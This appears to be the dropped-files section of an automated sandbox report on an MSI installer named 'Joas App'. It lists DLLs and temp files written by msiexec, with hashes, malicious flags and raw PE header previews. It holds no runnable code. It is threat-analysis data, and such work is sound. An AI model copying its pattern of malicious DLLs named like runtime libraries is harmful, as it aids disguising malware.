                                                          SSDEEP:12288:FgLcjQQPKZZK8aF4yBj3Fnx4DMDO8jalo:FggjQKuyDnxvOYaC
                                                          MD5:01DACEA3CBE5F2557D0816FC64FAE363
                                                          SHA1:566064A9CB1E33DB10681189A45B105CDD504FD4
                                                          SHA-256:B4C96B1E5EEE34871D9AB43BCEE8096089742032C0669DF3C9234941AAC3D502
                                                          SHA-512:C22BFE54894C26C0BD8A99848B33E1B9A9859B3C0C893CB6039F9486562C98AA4CEAB0D28C98C1038BD62160E03961A255B6F8627A7B2BB51B86CC7D6CBA9151
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*...D..D..D.....D.1J...D...@..D...G..D...A..D...E..D..E..D...E..D..E.O.D...A..D...D..D......D.....D...F..D.Rich..D.........PE..d.....-a.........." ...............................................................E..... .....................................................,.......@....p..xK..................`...T.......................(.......................(............................text............................... ..`.rdata..H=.......>..................@..@.data....H... ...@..................@....pdata..xK...p...L...J..............@..@.rsrc...@...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):98224
                                                          Entropy (8bit):6.452201564717313
                                                          Encrypted:false
                                                          SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                          MD5:F34EB034AA4A9735218686590CBA2E8B
                                                          SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                          SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                          SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140_1.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):37256
                                                          Entropy (8bit):6.297533243519742
                                                          Encrypted:false
                                                          SSDEEP:384:5hnvMCmWEKhUcSLt5a9k6KrOE5fY/ntz5txWE6Wc+Xf0+uncS7IO5WrCKWU/tQ0g:YCm5KhUcwrHY/ntTxT6ov07b4SwY1zl
                                                          MD5:135359D350F72AD4BF716B764D39E749
                                                          SHA1:2E59D9BBCCE356F0FECE56C9C4917A5CACEC63D7
                                                          SHA-256:34048ABAA070ECC13B318CEA31425F4CA3EDD133D350318AC65259E6058C8B32
                                                          SHA-512:CF23513D63AB2192C78CAE98BD3FEA67D933212B630BE111FA7E03BE3E92AF38E247EB2D3804437FD0FDA70FDC87916CD24CF1D3911E9F3BFB2CC4AB72B459BA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D_.O.>...>...>...N...>..RK...>...F^..>...>..1>..RK...>..RK...>..RK...>..RK...>..RK2..>..RK...>..Rich.>..........................PE..d...)|.a.........." .....:...6......`A....................................................`A.........................................l.......m..x....................n...#......<...(b..T............................b..8............P..X............................text...e9.......:.................. ..`.rdata.. "...P...$...>..............@..@.data... ............b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..<............l..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\w32-pthreads.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):53576
                                                          Entropy (8bit):6.371750593889357
                                                          Encrypted:false
                                                          SSDEEP:1536:ij2SSS5nVoSiH/pOfv3Q3cY37Hx1nI6q:GhSSntiH/pOfvAf3
                                                          MD5:E1EEBD44F9F4B52229D6E54155876056
                                                          SHA1:052CEA514FC3DA5A23DE6541F97CD4D5E9009E58
                                                          SHA-256:D96F2242444A334319B4286403D4BFADAF3F9FCCF390F3DD40BE32FB48CA512A
                                                          SHA-512:235BB9516409A55FE7DDB49B4F3179BDCA406D62FD0EC1345ACDDF032B0F3F111C43FF957D4D09AD683D39449C0FFC4C050B387507FADF5384940BD973DAB159
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.<.K.o.K.o.K.o.3.o.K.oK7.n.K.oK7so.K.oK7.n.K.oK7.n.K.oK7.n.K.o'9.n.K.o.K.o.K.o,6.n.K.o,6.n.K.o,6qo.K.o.K.o.K.o,6.n.K.oRich.K.o........PE..d....Q............" ...#.b...J.......f............................................../.....`............................................X...(...........................H'......8.......p...........................P...@...............@............................text...ha.......b.................. ..`.rdata..P,...........f..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..8...........................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\zlib.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):144200
                                                          Entropy (8bit):6.592048391646652
                                                          Encrypted:false
                                                          SSDEEP:1536:GjxOs8gLeu4iSssNiTh9Yks32X3KqVy5SmBolzXfqLROJA0o1ZXMvr7Rn6dheIOI:I34iDsG5vm4bfqFKoDmr7h2MHTtwV6K
                                                          MD5:3A0DBC5701D20AA87BE5680111A47662
                                                          SHA1:BC581374CA1EBE8565DB182AC75FB37413220F03
                                                          SHA-256:D53BC4348AD6355C20F75ED16A2F4F641D24881956A7AE8A0B739C0B50CF8091
                                                          SHA-512:4740945606636C110AB6C365BD1BE6377A2A9AC224DE6A79AA506183472A9AD0641ECC63E5C5219EE8097ADEF6533AB35E2594D6F8A91788347FDA93CDB0440E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...&............P....................................................`... ......................................0..|....@..8....p..................H'......................................(....................A..p............................text...............................`..`.data...............................@....rdata...W.......X..................@..@.pdata..............................@..@.xdata..............................@..@.bss......... ...........................edata..|....0......................@..@.idata..8....@......................@....CRT....X....P......................@....tls.........`......................@....rsrc........p......................@....reloc..............................@..B................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Microsoft\Installer\{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}\icon_31.exe

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:MS Windows icon resource - 5 icons, 96x96, 32 bits/pixel, 72x72, 32 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):74814
                                                          Entropy (8bit):4.222546221932802
                                                          Encrypted:false
                                                          SSDEEP:384:ZjEycsRokXVkGKlrBRRRR/ur/f4C2+27g6Do:ZNcs/VkhlYf4CffG
                                                          MD5:32BC544E3EB5F62017DDB0E8E22F3048
                                                          SHA1:4CAB98A7CABD3C9D6FC99AD1E4663BC06C7D73CF
                                                          SHA-256:FAF4A3D5669725D2059158A4039BB03E0A599685C61794687E14D21F3F271132
                                                          SHA-512:294AACF59822FE78C0E6D3178988E313A3E42BE997162C77581E9BE334F926881F10A955AA337549CE5889DFA51AB188767521C3B23AD27276EDC1F97FD7D8D1
                                                          Malicious:false
                                                          Preview:......``.... .....V...HH.... ..T......00.... ..%...... .... ............... .h.......(...`......... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\41d8ef.msi

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {DA5E0F10-2101-4D17-9C89-A01D7F5CF622}, Number of Words: 10, Subject: Joas App, Author: Barsoc Quite Sols, Name of Creating Application: Joas App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Joas App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jan 14 17:29:51 2025, Last Saved Time/Date: Tue Jan 14 17:29:51 2025, Last Printed: Tue Jan 14 17:29:51 2025, Number of Pages: 450
                                                          Category:dropped
                                                          Size (bytes):59426257
                                                          Entropy (8bit):7.223374477574857
                                                          Encrypted:false
                                                          SSDEEP:1572864:7okVmrjV7eILsOTZGcaN51GnOY3v+4p3cO6Gs:87scu+Z3H2t
                                                          MD5:32AF5CFAB7BB87BEEDB521DE43837347
                                                          SHA1:2F128DB2405DD0362CE55629816DC8BBE83C0478
                                                          SHA-256:B582B290012AF285192FFDECC87A30F3964DACB82E26025C558AA0F46F2AB6FE
                                                          SHA-512:CA18C6552DB2D1D1502C75D41D69DD91A4F76A42C9E6C0D912871B65F085CCAF772CEBC0555D658E4DA4CAA48DEEF0B14A8E4D812C2461FD18661CEA410BE7E3
                                                          Malicious:false
                                                          Preview:......................>............................................)..........~.......................................................w...............................................................................................................................................T.......?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...."..."...#...#...#...#...#...#...#..''..('..)'..*'...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)..............c...........................8...............B................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...7.../...0...1...2...3...4...5...6.......9...L...:...;...<...=...>...?...@...A...D...C...J...E...F...G...H...I...W...K...M...N...d...O...P...Q...R...S...T...U...V...$...%...Y...Z...[...\...]...^..._...`...a...b.......}...e...f...g...h...i...j...k...l...m...n...o...p...q.......s...t...u...v...w...x...y...z...

                                                          C:\Windows\Installer\41d8f2.msi

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {DA5E0F10-2101-4D17-9C89-A01D7F5CF622}, Number of Words: 10, Subject: Joas App, Author: Barsoc Quite Sols, Name of Creating Application: Joas App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Joas App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jan 14 17:29:51 2025, Last Saved Time/Date: Tue Jan 14 17:29:51 2025, Last Printed: Tue Jan 14 17:29:51 2025, Number of Pages: 450
                                                          Category:dropped
                                                          Size (bytes):59426257
                                                          Entropy (8bit):7.223374477574857
                                                          Encrypted:false
                                                          SSDEEP:1572864:7okVmrjV7eILsOTZGcaN51GnOY3v+4p3cO6Gs:87scu+Z3H2t
                                                          MD5:32AF5CFAB7BB87BEEDB521DE43837347
                                                          SHA1:2F128DB2405DD0362CE55629816DC8BBE83C0478
                                                          SHA-256:B582B290012AF285192FFDECC87A30F3964DACB82E26025C558AA0F46F2AB6FE
                                                          SHA-512:CA18C6552DB2D1D1502C75D41D69DD91A4F76A42C9E6C0D912871B65F085CCAF772CEBC0555D658E4DA4CAA48DEEF0B14A8E4D812C2461FD18661CEA410BE7E3
                                                          Malicious:false
                                                          Preview:......................>............................................)..........~.......................................................w...............................................................................................................................................T.......?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...."..."...#...#...#...#...#...#...#..''..('..)'..*'...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)..............c...........................8...............B................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...7.../...0...1...2...3...4...5...6.......9...L...:...;...<...=...>...?...@...A...D...C...J...E...F...G...H...I...W...K...M...N...d...O...P...Q...R...S...T...U...V...$...%...Y...Z...[...\...]...^..._...`...a...b.......}...e...f...g...h...i...j...k...l...m...n...o...p...q.......s...t...u...v...w...x...y...z...

                                                          C:\Windows\Installer\MSI2A5.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):93975
                                                          Entropy (8bit):4.975289352407628
                                                          Encrypted:false
                                                          SSDEEP:384:ssyUZQBW9WTXEx7jEycsRokXVkGKlrBRRRR/ur/f4C2+27g6DoO2sN:ssy0QQ9WTXEZNcs/VkhlYf4CffGOK
                                                          MD5:D50DAD053D41C8ADE102D29439B9562A
                                                          SHA1:3BE78D2B62A13211E509836E0F31E5D3C4D30DBA
                                                          SHA-256:1969BD19A463D47D0D869E2804BF73DDCA255AA54D900D0F123B3846F95D84E4
                                                          SHA-512:FFF3377118F2690CB53966AE7D3BE602D2FBF058D764D0A58A18C6B9A116A8ECE7E05F025606DA5D71BD6DFE6892B80E24E1831025EE7232EA24A3F50F130D02
                                                          Malicious:false
                                                          Preview:...@IXOS.@.....@i..Z.@.....@.....@.....@.....@.....@......&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}..Joas App..K064a7Rfk7.msi.@.....@.....@.....@......icon_31.exe..&.{DA5E0F10-2101-4D17-9C89-A01D7F5CF622}.....@.....@.....@.....@.......@.....@.....@.......@......Joas App......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@2....@.....@.]....&.{F39C344E-A83E-4760-8DA8-F27602095B4F}=.C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\.@.......@.....@.....@......&.{BC83E781-7DE2-47A8-97C3-2E6CC9BCAD82}/.21:\Software\Barsoc Quite Sols\Joas App\Version.@.......@.....@.....@......&.{279C32E3-A00A-4513-9A8B-D3984A41A6FB}F.C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dll.@.......@.....@.....@......&.{B61B35E4-8BE1-4171-B69B-E2423CE9179F}M.C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140.dll.@.......@.....@.....@......&.{FDDB96EE-847

                                                          C:\Windows\Installer\MSIE0DE.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1021792
                                                          Entropy (8bit):6.608727172078022
                                                          Encrypted:false
                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSIE18B.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1021792
                                                          Entropy (8bit):6.608727172078022
                                                          Encrypted:false
                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSIE1CA.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1021792
                                                          Entropy (8bit):6.608727172078022
                                                          Encrypted:false
                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSIE1FA.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1021792
                                                          Entropy (8bit):6.608727172078022
                                                          Encrypted:false
                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSIE249.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1201504
                                                          Entropy (8bit):6.4557937684843365
                                                          Encrypted:false
                                                          SSDEEP:24576:W4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWeTIUGVUrHtAkJMsFUh29BKjxw:D2QxNwCsec+4VGWSlnfYvO3UGVUrHtAg
                                                          MD5:E83D774F643972B8ECCDB3A34DA135C5
                                                          SHA1:A58ECCFB12D723C3460563C5191D604DEF235D15
                                                          SHA-256:D0A6F6373CFB902FCD95BC12360A9E949F5597B72C01E0BD328F9B1E2080B5B7
                                                          SHA-512:CB5FF0E66827E6A1FA27ABDD322987906CFDB3CDB49248EFEE04D51FEE65E93B5D964FF78095866E197448358A9DE9EC7F45D4158C0913CBF0DBD849883A6E90
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............@G..@G..@G.yCF..@G.yEF..@G.|CF..@G.|DF..@G.|EF..@G.yDF..@G.yAF..@G..AG..@G.}IF..@G.}@F..@G.}.G..@G...G..@G.}BF..@GRich..@G........PE..L...'.$g.........."!...).~..........Pq.......................................`......0.....@A........................ ...t...............................`=.......l......p........................... ...@...............L............................text...J}.......~.................. ..`.rdata...;.......<..................@..@.data...............................@....fptable............................@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSIE289.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1021792
                                                          Entropy (8bit):6.608727172078022
                                                          Encrypted:false
                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSIE336.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1021792
                                                          Entropy (8bit):6.608727172078022
                                                          Encrypted:false
                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\SourceHash{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.163630125591935
                                                          Encrypted:false
                                                          SSDEEP:12:JSbX72FjL6AGiLIlHVRpZh/7777777777777777777777777vDHFaTz7NMuit/lN:JYQI5tyBMiF
                                                          MD5:FAEACD97DECA5DF029D6A209199CE41C
                                                          SHA1:4D4906BA34C0115D4C2AA1966434678166373F0A
                                                          SHA-256:A91E70F411D66B3B63ACBA70DABDA573C59AD7A066D738C0BB66A7CBCBED7CB0
                                                          SHA-512:8905D30AF1B15C4B0FCEB7856077703A1156AE09E1A353596843A6D42E0A2434982245E790C24C316E469F42FFBB5A9519B2EE519EABC331289C7438CAA69200
                                                          Malicious:false
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\inprogressinstallinfo.ipi

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.574504812419244
                                                          Encrypted:false
                                                          SSDEEP:48:Ny8PhUuRc06WXJSjT5qKnuAEbCyqSNhMUXgSUTESF:NdhU1JjTkKtwCB4Xgt
                                                          MD5:79F0D1E902CC9D5F62DA1B38C8C82288
                                                          SHA1:68510A9304ACACAC76C3079A4D4A11EE521B1AE9
                                                          SHA-256:08C3F01A544E90B78C789DF944D6FD91CDC6E46F3D3AB2A03C003772A75369D2
                                                          SHA-512:B517339AAEC4F1E38CBD6EB14AA08873C4625CCDA15510016554578B4C5225BC705C4591B16E3A614514F45988E7F0D22C435EA5973E7841C44248CD4708DCDF
                                                          Malicious:false
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):360001
                                                          Entropy (8bit):5.3629952290808465
                                                          Encrypted:false
                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauo:zTtbmkExhMJCIpEh
                                                          MD5:0F9BDA45F89DD1FE385B61A449058AEA
                                                          SHA1:DD8346ECF64DB978582D34135F51A5D8412CEC95
                                                          SHA-256:2B67879E7845621ACE5DEABDBC44147BD2A1A7F20FB6B4FBD8B1B4E56388B3B8
                                                          SHA-512:AF51C1749145FDA468B03FB75C77F79DF7E2BEC2A0B8870F371603089ACD07CB58E1D54434D4A9500D83FB8EF6FB13D490A5FB3943C64D1B5E317595752E8671
                                                          Malicious:false
